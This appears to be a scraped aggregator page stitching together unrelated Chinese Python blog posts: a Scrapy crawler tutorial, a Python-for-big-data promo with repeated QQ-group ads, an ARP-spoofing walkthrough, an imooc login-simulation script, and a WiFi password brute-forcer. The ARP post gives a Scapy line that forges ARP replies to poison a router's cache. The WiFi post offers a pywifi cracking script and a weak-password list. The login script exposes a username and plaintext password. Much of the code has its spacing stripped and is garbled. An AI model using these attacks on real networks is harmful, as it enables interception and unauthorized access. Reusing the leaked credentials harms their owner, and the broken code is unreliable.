其中 process_request ,返回 None ,Scrapy将继续到其他的middleware进行处理。

class RandomUserAgent(object): def __init__(self,agents): self.agents = agents @classmethod def from_crawler(cls,crawler): return cls(crawler.settings.getlist('USER_AGENTS')) def process_request(self,request,spider): request.headers.setdefault('User-Agent',random.choice(self.agents))

接着道 settings 中设置

DOWNLOADER_MIDDLEWARES = { 'douban.middlewares.RandomUserAgent': 1, } ... USER_AGENTS = [ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", ... ]

再次运行程序,显然速度快了不少。

保存到MongoDB

接下来我们要将数据保存到数据库做持久化处理(这里用MongoDB举例,保存到其他数据库同理)。

这部分处理是写在 pipelines 中。在此之前我们还要先安装连接数据库的驱动。

pip install pymongo

我们在 settings 写下配置

# MONGODB configure MONGODB_SERVER = 'localhost' MONGODB_PORT = 27017 MONGODB_DB = 'douban' MONGODB_COLLECTION = "book" class MongoDBPipeline(object): def __init__(self): connection = MongoClient( host=settings['MONGODB_SERVER'], port=settings['MONGODB_PORT'] ) db = connection[settings['MONGODB_DB']] self.collection = db[settings['MONGODB_COLLECTION']] def process_item(self, item, spider): self.collection.insert(dict(item)) log.msg("Book added to MongoDB database!", level=log.DEBUG, spider=spider) return item 其他

将运行项目的时候控制台中输出的DEBUG信息保存到log文件中。只需要在 settings 中设置

LOG_FILE = "logs/book.log"

项目代码地址: 豆瓣图书爬虫

为什么大数据选择python?

$
0
0

连接点的数据,赋予每个人加速时间的价值

python是一个强大的,灵活的,开放的,易于学习的源语言,使用方便,并具有强大的数据操作和分析库。其简单的语法使编程新手很容易学习和掌握,经历过Matlab,,C / C++,java,或Visual Basic,Python提供了一个独特的组合,都能使用编程语言以及使用方便的分析和定量计算。


为什么大数据选择python?

在过去的十年中,Python已经被用于科学计算、金融等高度量化的领域,石油和天然气,物理,和信号处理。它已被用于提高航天飞机的设计,从哈勃太空望远镜的图像处理,是实现物理实验导致发现了希格斯玻色子的工具(所谓的“上帝粒子”)。

如果你想学习Python可以来这个群,首先是四七二,中间是三零九,最后是二六一,里面有大量的学习资料可以下载。

同时,Python已经被用于构建大规模可扩展的Web应用程序,像YouTube,并推动谷歌内部基础设施。像迪士尼、索尼和梦工厂公司,卢卡斯ILM都依赖Python协调大规模的集群计算机图形服务器轰动的电影产生的意象。根据TIOBE指数,Python是一个在世界上最流行的编程语言,排名高于Perl,Ruby,和javascript


为什么大数据选择python?

Python是一门强大的语言,成功的在大数据和商业数据分析中得到使用。我们专注于为最终用户领域专家提供最具表现力,易于使用的工具。

每一个业务部门是由现代洪水数据转化。这对某些人来说意味着毁灭,并为他人创造了巨大的机会。那些在这种环境中茁壮成长的人只会通过快速转换数据成为有意义的商业洞察力和竞争优势。业务分析师和数据科学家需要使用敏捷工具,而不是被遗留的信息架构奴役。

Python的学习和使用简单,但足以应付甚至在几乎任何领域最困难的问题。它与现有的IT基础设施无缝集成,并独立于平台。各种规模的企业和各个领域-从最大的投资银行到最小的Web应用程序的初创公司都正在使用Python来运行他们的业务和管理他们的数据。

大家过年好!

使用Python进行简单的ARP攻击

$
0
0

今天的实验目的就是利用其原理上的缺陷进行网络攻击。


使用Python进行简单的ARP攻击

网络拓扑

如上图所示,2台路由器和攻击者(我用的是linux)连在同一个局域网里,实验中要对R1进行ARP欺骗,使R1认为R2的MAC地址是攻击者的MAC地址(R1以为把数据包发给R2,但其实都发到攻击者那里了)。

先看一下3台设备的真实MAC地址:


使用Python进行简单的ARP攻击

R1正常ARP缓存

上图是在R1上正常ping通R2和攻击者后缓存的ARP信息。

R1:ca01.2828.0000

R2:ca02.2434.0000

攻击者:0800.27d6.9d83

在Linux上安装Scapy: pip3 install scapy-python3(和以前的文章一样,主要目的是简单演示,有些没有介绍到的细节请自行上网查询)如果你想学习Python可以来这个群,首先是四七二,中间是三零九,最后是二六一,里面有大量的学习资料可以下载。


使用Python进行简单的ARP攻击

Python所有代码

如上图所示代码(为方便初学者学习,我尽可能的精简代码,只使用能够满足实验需求的代码),前面几行是定义了需要用到的IP和MAC地址,不多做解释,主要看后面两行:

pkt = Ether(src=Hack_MAC, dst=R1_MAC) / ARP(hwsrc=Hack_MAC, psrc=R2_IP,hwdst=R1_MAC,pdst=R1_IP,op=2)

这行代码是构造一个ARP包,有源IP,源MAC,目的IP,目的MAC。目标是发往R1,源IP冒充R2,也很容易理解。注意最后有个op=2,这个op的含义:1表示ARP请求,2表示ARP应答(参考上篇文章里面的抓包图片,这里就不再贴图了)

sendp(pkt,iface='enp0s3')这行代码是将刚才构造的包从enp0s3这个网卡发送出去。

现在运行Python脚本:


使用Python进行简单的ARP攻击

执行脚本

可以看见,发送了一个ARP应答包。

现在再看R1上的ARP缓存:


使用Python进行简单的ARP攻击

实验结果

R1上ARP缓存已经被修改,错误的指向了攻击者,已经达到(暂时)欺骗的目的,实验完成。(我就不说ARP攻击有什么用了...)

最后再说明一次,文章只是简单的演示,会有不严谨的地方,只要能达到实验效果即可。想深入学习的同学可自行研究,完善代码。

Python学习交流群 472309261

Python模拟登陆练习――imooc.com登陆

$
0
0

写下这篇文章的时候,是博主学习python的第三天( 也许是第四天:( ),python是博主接触的第二门解释型语言(第一门是javascript)。

讲真在很久之前就想要用博客记录自己的学习历程了,然而就像写日记一样,写着写着就放弃了-。-

so今天决定给自己一个好的开端~

博主的学习方式是直奔目的,遇到问题百度各种博客,网站,百度找不到google找,就这样。这种学习方式是真的见效快,但显而易见,基础会比较薄弱。

因此学习python的基本语法,就直奔爬虫了!

-----------------------------------以上是一段大前言---------------------------------------------

今天博主要把三天学习spider的过程,经验分享出来,希望能给一些新手们指点一下道路,也给自己的python生涯刻一道痕迹。

博主愚以为,模拟登陆网站无非有两种方式:

一是手动收取cookie。

在浏览器登陆网站并完成登录后,然后打开开发者工具,随便访问某页面,根据实际情况找一条request,把cookie复制下来。

二是python收取cookie。

这也是本篇文章详细阐述的。见下。

现在让博主以imooc.com为例讲解一下网站的模拟登陆

开始

博主习惯用urllib2+cookielib的方式写爬虫,所以代码的一开始是这样的:

#coding=utf8 import sys reload(sys) sys.setdefaultencoding('utf8') import urllib2 import urllib import cookielib #以上是套路 #以下创建一个cookiejar管理cookie,同时创建opener并安装到urllib2中 cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) opener.addheaders=[('user-agent','Mozilla/5.0')]

opener.addheaders可以以list的形式添加header,非常方便

然后

cookie是一种服务器记录用户信息的小文件,尽管有时候会侵犯大家的隐私,但是在存储用户的登录信息实现自动登陆的方式还是很方便的。

它的工作流程是这样的:

首先服务器会在第一次访问网站时向浏览器返回一个response,其中会有几条set-cookie的信息,于是浏览器默默帮你把它记录到cookie中去 当你点击登陆,输入用户名、密码等必要信息后,浏览器会将你的信息连同以上cookies中的某些一并post给服务器 登陆成功后浏览器又收到服务器的悄悄话――得到几条重要cookie并保存下来 如果此时你没关闭浏览器,在访问该网站其他页面时,浏览器会把某些cookie发送给服务器,这时候你发现你已经自动登录了 如果登陆时你选择了“自动登录”“7天内自动登陆”诸如此类checkbox,浏览器还会得到一些长久的cookie(十天半个月的)以便你明天登陆,后天登陆。。。。

了解cookie的工作原理后,我们访问一下主页,把cookie搞下来

博主是这样写的: #先写下几条url url_login = 'http://www.imooc.com/passport/user/login' url_index = 'http://www.imooc.com' url_test = 'http://www.imooc.com/user/setbindsns' data = { 'username':'*********', 'password':'*******', 'verify':'', 'remember':'1', 'pwencode':'0', 'referer':'http://www.imooc.com' } data_encoded = urllib.urlencode(data) #get主页获取cookie req_index = urllib2.Request(url_index) res_index = opener.open(req_index)

我们可以打印下cookie看看:

print cj._cookies

{'www.imooc.com': {'/': {'phpSESSID': Cookie(version=0, name='PHPSESSID', value='3q1c66hds4h054f19ciqb4rtg2', port=None, port_specified=False, domain='www.imooc.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={}, rfc2109=False)}}, '.imooc.com': {'/': {'imooc_isnew_ct': Cookie(version=0, name='imooc_isnew_ct', value='1486280759', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=1517816759, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), 'cvde': Cookie(version=0, name='cvde', value='5896d8376631d-1', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={}, rfc2109=False), 'imooc_isnew': Cookie(version=0, name='imooc_isnew', value='1', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=1517816759, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), 'imooc_uuid': Cookie(version=0, name='imooc_uuid', value='d6a73549-4d53-47b6-90bc-28888d3438b8', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=1517816759, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False)}}}

这是什么,我不知道。Let it go.

然后

那我们带着cookie去登陆吧!不知道带哪一条?全带走!

req_login = urllib2.Request(url_login,data_encoded) res_login = opener.open(req_login)

我们试着把结果打印在html上:

imooc = open('e:/imooc.html','w') imooc.write(res_login.read()) imooc.close() 当我们打开:
Python模拟登陆练习――imooc.com登陆

这TM好像不是个html,通常情况下他会返回一个html,然而这串符号难住了学了3天python的小白。

注意到一条信息: “msg” : "\u6210\u529f"显然是unicode格式的字符串,简单转化后,他的意思是 :“成功”

博主窃喜。既然成功了,那么有效信息一定存在于这串符号中。

到此,正确的思路是,拿着这2条url,uid用开发者工具继续搜索相关信息。

。。

然而博主走了一条小弯路。

逆向分析大法

博主决定把登陆之后的cookies复制下来,逐条测试登陆需要的cookie

很简单,一条一条的删,看什么时候能登陆就好了。。。

。。。。

经过筛选,博主找到2条我们需要的cookie:loginstate、apsid。

于是博主决定在近百条cookie中找一下apsid这条信息

。。。

找到了!


Python模拟登陆练习――imooc.com登陆

而访问的url就是我们得到的2条之一!只是带了几个参数

实践证明这2条随便选一条get一下就得到我们需要的cookie了。

窃喜

我们需要3个参数:token(url已经附带)、callback、 _(下划线-。-)

经验证 ,callback参数是固定值。

好的,那我们搜索一下下划线的值。

查下cookie,发现它是imooc_isnew_ct的值

到这里基本已经大功告成了~

全部代码:

#coding=utf8 #最后版本 import sys reload(sys) sys.setdefaultencoding('utf8') import urllib2 import urllib import cookielib cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) opener.addheaders=[('user-agent','Mozilla/5.0')] url_login = 'http://www.imooc.com/passport/user/login' url_index = 'http://www.imooc.com' url_test = 'http://www.imooc.com/user/setbindsns' data = { 'username':'13153154784', 'password':'liuweidong', 'verify':'', 'remember':'1', 'pwencode':'0', 'referer':'http://www.imooc.com' } data_encoded = urllib.urlencode(data) #get主页获取cookie req_index = urllib2.Request(url_index) res_index = opener.open(req_index) print cj._cookies print #post登陆页面 req_login = urllib2.Request(url_login,data_encoded) res_login = opener.open(req_login) print res_login.read() res_dict = eval(res_login.read()) url_ssologin = res_dict['data']['url'][0] print url_ssologin import re url_ssologin = re.sub(r'\\/','/',url_ssologin) print url_ssologin params = { 'callback':'jQuery19106404770042720387_1486274878204', '_': str(cj._cookies['.imooc.com']['/']['imooc_isnew_ct'])[23:33] } url_ssologin = url_ssologin+'&'+urllib.urlencode(params) #sso登陆页面 req_sso = urllib2.Request(url_ssologin) res_sso = opener.open(req_sso) # print res_sso.read() # print cj._cookies['.imooc.com']['/']['loginstate'] req_test = urllib2.Request(url_test) res_test = opener.open(req_test) imooc = open('c:/users/asus/desktop/imooc.html','w') imooc.write(res_test.read()) imooc.close() 博主其实遇到了好多问题,走了好多弯路,感谢某dalao的无私帮助:) 第一次写博客,欢迎技术交流与指正~

WiFi密码怎么破?一个Python脚本搞定

$
0
0
WiFi密码怎么破?一个python脚本搞定

一点号编程派6小时前

「短暂」的春节假期已经结束了,想必今天大家都已经开工了。新的一年,一起继续学习 Python,鸡年雄起~~

本文仅供大家参考,不要滥用哦。

原文:https://my.oschina.net/Apathy/blog/821039

环境准备

python 2.7

凑合的 linux

差不多的无线网卡

pywifi模块

弱口令字典

清除系统中的任何 wifi 连接记录 \ (非常重要 \ ! \ ! \ ! \ )

首先,这个模块在 win 下有点鸡肋,作者在调用 WLANAPI 时没有做好 WLANSECURITYATTRIBUTES 的封装,所以推荐在 linux 下跑,我测试所使用的是 Kali 2.0 自带 python 2.7.6 ,可直接通过 pip install pywifi 安装。

导入模块

这里用的模块就这三个。pywifi 的 wifiutillinux.py 脚本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。

frompywifiimport*

importtime

importsys

字典准备

效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的 wifi 弱口令 TOP 10:

12345678

123456789

88888888

1234567890

00000000

87654321

66668888

11223344

147258369

11111111

配置扫描器

推荐扫描时常可以设置在15-20秒之间。测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义。到时候就算破解成功的热点,信号也好不到哪里

defmain:

#扫描时常

scantimes=3

#单个密码测试延迟

testtimes=15

output=sys.stdout

#结果文件保存路径

files="TestRes.txt"

#字典列表

keys=open(sys.argv[1],"r").readlines

print"|KEYS %s"%(len(keys))

#实例化一个pywifi对象

wifi=PyWiFi

#选择定一个网卡并赋值于iface

iface=wifi.interfaces[0]

#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

scanres=scans(ifacescantimes)

#统计附近被发现的热点数量

nums=len(scanres)

print"|SCAN GET %s"%(nums)

print"%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*706"WIFIID"18"SSID OR BSSID"2"N"4"time"7"signal"10"KEYNUM"10"KEY""="*70)

#将每一个热点信息逐一进行测试

forixinenumerate(scanres):

#测试完毕后,成功的结果讲存储到files中

res=test(nums-iifacexkeysoutputtesttimes)

ifres:

open(files"a").write(res)

扫描周围热点

defscans(facetimeout):

#开始扫描

face.scan

time.sleep(timeout)

#在若干秒后获取扫描结果

returnface.scan_results

热点测试

这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

deftest(ifacexkeystuts):

#显示对应网络名称,考虑到部分中文名啧显示bssid

showID=x.bssidiflen(x.ssid)>len(x.bssid)elsex.ssid

#迭代字典并进行爆破

fornkinenumerate(key):

x.key=k.strip

#移除所有热点配置

face.remove_all_network_profiles

#讲封装好的目标尝试连接

face.connect(face.add_network_profile(x))

#初始化状态码,考虑到用0会发生些逻辑错误

code=10

t1=time.time

#循环刷新状态,如果置为0则密码错误,如超时则进行下一个

whilecode!=0:

time.sleep(0.1)

code=face.status

now=time.time-t1

ifnowts:

break

stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6i18showIDcode5now7x.signal10len(key)-n10k.replace("\n""")))

stu.flush

ifcode==4:

face.disconnect

return"%-*s| %s | %*s |%*s\n"%(20x.ssidx.bssid3x.signal15k)

returnFalse

案例

这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

_ * WIFIID * _ 热点的 id 号 每跑一个会减1

_ * SSID OR BSSID * _ 热点的 ssid 名或 mac 地址

_ * N * _ 对热点的连接状态,这个在

* _time_ * 当前所花去的时间

* _signal_ * 热点的信号强度,若小越好

* _KEYNUM_ * 测试密码的 id 每跑一个会减1

* _KEY_ * 当前测试的密码


php?url=0Fa6NCxxhH" alt="WiFi密码怎么破?一个Python脚本搞定" />

结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -

传送门

后台回复关键词 wifi,即可获取相关字典、源码和模块的分享链接。

题图:pexels,CC0 授权。

Viewing all 9596 articles
Browse latest View live